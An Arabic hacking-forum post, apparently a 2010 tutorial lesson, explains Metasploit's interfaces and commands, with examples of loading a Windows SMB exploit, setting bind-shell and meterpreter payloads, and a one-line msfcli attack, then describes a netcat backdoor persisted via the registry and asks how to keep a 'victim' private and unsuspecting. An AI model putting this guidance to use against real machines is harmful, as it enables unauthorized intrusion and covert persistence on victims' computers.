19/04/2010, 17:26
|
المشاركة رقم: 1
|
| المعلومات |
| الكاتب: |
|
| اللقب: |
|
| الصورة الرمزية |
|
|
| البيانات |
| التسجيل : |
Mar 2010 |
| العضوية : |
2 |
| الاهتمامات : |
DZ |
| الإقامة : |
DZ |
| المواضيع : |
466 |
| الردود : |
629 |
| المجموع : |
1,095 |
| بمعدل : |
0.19 يوميا |
| الاختراقات : |
[ra3ch] |
| مجتمعنا : |
[] |
| الصنف : |
Not Hacker |
| آخر تواجد : |
02/01/2018/12:49 |
| سبب الغياب : |
معكم ألي أخر ضربه أدا كتب ربي.. |
| معدل التقييم: |
10 |
| نقاط التقييم: |
18 |
شكراً: 493
تم شكره 194 مرة في 101 مشاركة
| الإتصالات |
| الحالة: |
|
| وسائل الإتصال: |
|
|
الدرس الخامس : التعامل مع الميتاسبلويت
السلام عليكم ورحمه الله
اليوم درسنا راح يتكلم عن كيفيه التعامل مع واجهات الميتاسبلويت
وهي
1- msfconsole
msfcli -2
msfgui -3
msfw eb -4
msfconsole: هي الواجه المفضله لدي , اولا لانها تتعامل مع سطر الاوامر , ثانيا استخدام اوامر
الليونكس بداخلها , بمعنى اخر بأمكان الفحص والتعامل مع اوامر الليونكس وانت بداخلها .
msfcli : اداه قويه من ناحيه الفكره وسريعه ايضا , بأمكانك استغلال الثغره بدون الدخول الى
msfconsle , استغلال الثغره يتم بسطر واحد , على حسب اعتقادي الاداه هذه
وضعوها ليتم كتابه السكربتات وادواات تستخدم الميتاسبلويت مثل fasttrack
msfgui : الميتاسبلويت بواجه رسوميه ,, لكن لا انصح بها بتاتا اولا الواجهه بطيئه
ثانيا الواجهة ارى ان التعامل معها صعب وايضا ممل
msfwe b : واجهة رسوميه , لكن افضل من سابقتها , لا افضل استعمالها لانها بطيئه ايضا
راح اشرح msfconsole , msfcli لان بمعرفتهم تعرف كيفيه التعامل مع الاخريات .
1- msfconsole
راح اشرح الاوامر المهمه
1- show
الامر هذا يقصد به اعرض سواء payload encoder nops exploits auxiliary , options all
مثال :
show exploits
عرض الثغرات
show payloads
عرض payloads
show encoders
عرض encoders
show nops
عرض nops
show auxiliary
عرض auxiliary
show options
عرض الخيارات
2- use
بمعنى استخدم الثغره او auxiliary
كود:
use exploit/windows/smb/msdns_zone****
كود:
use auxiliary/scanner/smb/version
البعض يتسائل كيف احفظ اسم الثغره كامل ؟
ما يحتاج كل الي عليك كتابه use ex ومن ثم اضغط زر Tab على الكيبورد وراح يكمل كل شيء
3- info
عرض معلومات الثغره
مثال :
كود:
info exploit/windows/smb/msdns_zone****
كود:
use exploit/windows/smb/msdns_zone****
ثم
info
set -4
بمعنى ضع للمتغير قيمه
مثال
set rhost 192.168.1.3
set payload windows/shell_bind_tcp
connect -5
مثل اداه النت كات
exploit and run -6
exploit تستخدم لتشغيل الثغرات
run يستخدم لتشغيل auxiliary
back -7
العوده للوراء
مثال :
كود:
msf exploit(msdns_zone****) > back
msf >
بقيه الاوامر راح تكتشفها مع الاستخدام بأذن الله
نروح لطريقه استخدام الثغره
استخدامها سهل ما تتعدا خمس اوامر
كود:
اسم الثغره use
show option
ليتم عرض المتغيرات
اسم المتغير set
exploit
بعض الخيارات المخفيه حين اختيار الثغره .
show advanced
show evasion
ما انصح بتغيير خياراتهم الا اذا كنت فاهم المطلوب لان من كل ثغره لثغره تختلف , وبعض المرات
الثغره ما تشتغل الا بعد تعديل بعض الخيارات طبعا هذا بناء على جهاز ضحيتك ,
show targets
عرض الاهداف التي تشتغل الثغره عليها
نروح للاداه الاخرى msfcli
نروح لكيفيه الاستخدام
استخدامها سهل جدا وعن طريق سطر واحد
كود:
Usage: ./msfcli [mode]
====================================================
Mode Description
---- -----------
(H)elp Youre looking at it baby!
(S)ummary Show information about this module
(O)ptions Show available options for this module
(A)dvanced Show available advanced options for this module
(I)DS Evasion Show available ids evasion options for this module
(P)ayloads Show available payloads for this module
(T)argets Show available targets for this exploit module
(AC)tions Show available actions for this auxiliary module
(C)heck Run the check routine of the selected module
(E)xecute Execute the selected module
S = ملعومات الثغره
O = خيارات الثغره
ِE = تشغيل الثغره
P = عرض بايلود الخاصه
مثال لاستغلال ثغره
كود:
./msfcli exploit/windows/*** payload=windows/meterpreter/** rhost=A.B.C.D lhost=1.1.1.1
بدال ما نكتب داخل msfconsole
كود:
set rhost a.b.c.d
set payload windows/****
نضع
rhost=
payload=
هذا الشرح كمختصر بأمكانك التطبيق
انا عندي تطبيق قديم اسمه hacking the ip first guide مسويه قبل سنه
كانت عندي سلسله لكن طارت
تابع التطبيق , ومن ثم يأتي وقت السؤال
ملاحظه : اهم شيء التطبيق للثغره
كود PHP:
http://www.youtube.com/watch?v=vF3ZwD0vssk&feature=player_embedded
بعد ما تابعنا الفديو جاء وقت السؤال لكن هذا السؤال لتشغيل المخ , وممكن تصير اكثر من اجابه صح
في الفديو وضعنا النت كات كباك دور ومن ثم سجلناه بالريجستري عشان كل مره يشغل الجهاز يتصل على اي بي المهاجم
انا الان بشبكه داخليه وتعرفون ان الشبكه الداخليه ممكن يتغير اي بي بتاعك حين تفصل الاتصال من المودم
ا
او بأي طريق اخرى , طيب حين تفصل ممكن واحد يأخذ اي بي بتاعك , بكل تأكيد راح يطير الضحيه
انا ما ابي اثبت الاي بي بتاعي داخل الشبكه , لذلك نحتاج اتصال مباشر بمعنى اخر انا اللي اتصل بالضحيه مش الضحيه اللي يبي يتصل بي
لكن المشكله ان اي شخص غيري يقدر يتصل بعد لان اتصال مباشر
كيف اخلي الضحيه خاص بي بمعنى اخر انا اللي ابغى اتصل لوحدي ولا ابي احد يتصل معي
وايضا ما ابي اخلي الضحيه يشك
انا ابغى ناس تفكر مش تفتح القوقل وتبحث :-)
SiLv3r00t
V4-team.com
| توقيع : ViRuS_Ra3cH |
|
IS-SEC.ORG is ThE NaMe AnD HaKiNg Is ThE GaMe So FoRgEt ThE Name AnD LeT'S PlaY ThE GaMe
=======
[email protected]
=====
ViRuS_Ra3cH
====
===
|
|
|
|
العرض العادي
